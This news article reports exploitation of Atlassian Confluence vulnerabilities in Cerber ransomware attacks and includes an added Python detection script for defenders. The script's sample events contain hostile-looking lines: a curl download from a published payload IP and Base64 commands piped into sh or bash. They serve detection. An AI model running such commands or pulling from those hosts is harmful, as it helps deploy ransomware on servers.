Critical Atlassian Bug Exploited in Ransomware Attacks

Security researchers have warned that threat actors are already exploiting a critical Atlassian vulnerability for which a public exploit was found just last week.

Atlassian, the Australian software developer, said last Thursday that it had discovered “publicly posted critical information” about CVE-2023-22518, which has a CVSS score of 9.1 and impacts all versions of Atlassian Confluence Data Center and Server.

Then over the weekend, Rapid7 said it had observed exploitation of the vulnerability in “multiple customer environments,” as well as attacks using an older flaw, CVE-2023-22515, which is a critical broken access control bug discovered on October 4.

The security vendor explained that the process execution chain was consistent across multiple environments, hinting at mass exploitation of vulnerable internet-facing Atlassian Confluence servers.

“After the initial enumeration activity, the adversary executed Base64 commands to spawn follow-on commands via python2 or python3,” it added in a blog post.

“In multiple attack chains, Rapid7 observed post-exploitation command execution to download a malicious payload hosted at 193.43.72[.]11 and/or 193.176.179[.]41, which, if successful, led to single-system Cerber ransomware deployment on the exploited Confluence server.”
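
The following added example, which is not code from the article, Rapid7 or Atlassian, triages process command lines for the two behaviours quoted above: Base64-wrapped commands that invoke python2 or python3, and references to the two published payload hosts. The event field names and the sample events are constructed assumptions, not real telemetry.

```python
import base64
import re

# IoCs exactly as published in the article (defanged), refanged for matching.
IOCS = [ip.replace("[.]", ".") for ip in ("193.43.72[.]11", "193.176.179[.]41")]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
PYTHON = re.compile(r"\bpython[23]\b")


def decoded_tokens(cmdline):
    """Yield text recovered from Base64-looking tokens in a command line."""
    for tok in B64_TOKEN.findall(cmdline):
        try:
            yield base64.b64decode(tok, validate=True).decode("utf-8")
        except ValueError:  # bad padding/alphabet or non-text bytes: skip token
            continue


def triage(event):
    """Return the sorted reasons an event matches the reported chain."""
    cmd = event["cmdline"]
    hidden = list(decoded_tokens(cmd))
    reasons = set()
    if any(PYTHON.search(text) for text in hidden):
        reasons.add("base64-wrapped python2/python3")
    if any(ip in text for ip in IOCS for text in [cmd, *hidden]):
        reasons.add("published payload host")
    return sorted(reasons)


def _b64(s):
    return base64.b64encode(s.encode()).decode()


# Constructed process-creation events; the "cmdline" field name is an assumption.
EVENTS = [
    {"id": 1, "cmdline": "/usr/bin/git --version"},
    {"id": 2, "cmdline": f"echo {_b64('nightly backup finished ok')} | base64 -d"},
    {"id": 3, "cmdline": f"sh -c 'echo {_b64('python3 -c PLACEHOLDER')} | base64 -d | sh'"},
    {"id": 4, "cmdline": f"curl -s http://{IOCS[0]}/PLACEHOLDER -o /tmp/out"},
    {"id": 5, "cmdline": f"echo {_b64('python2 -c PLACEHOLDER ' + IOCS[1])} | bash"},
]


def flagged(events):
    """Map event id -> reasons, for events with at least one reason."""
    return {e["id"]: r for e in events if (r := triage(e))}


if __name__ == "__main__":
    for eid, reasons in flagged(EVENTS).items():
        print(eid, reasons)
```

Event 2 shows that Base64 on its own is not flagged; only decoded content that matches the reported behaviour is.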

For its part, Atlassian updated its own security advisory, nudging the CVSS score of CVE-2023-22518 up to 10.0 “due to the change in the scope of the attack.”

Customers are urged to update to the latest version of the product as soon as possible, although Atlassian Cloud users are not affected.

According to the non-profit ShadowServer, there are over 24,000 Confluence servers currently online, although it’s not clear how many remain on vulnerable software versions.

Atlassian initially warned that CVE-2023-22518 could allow an attacker to wipe any data they find in affected Confluence environments, although not exfiltrate it.
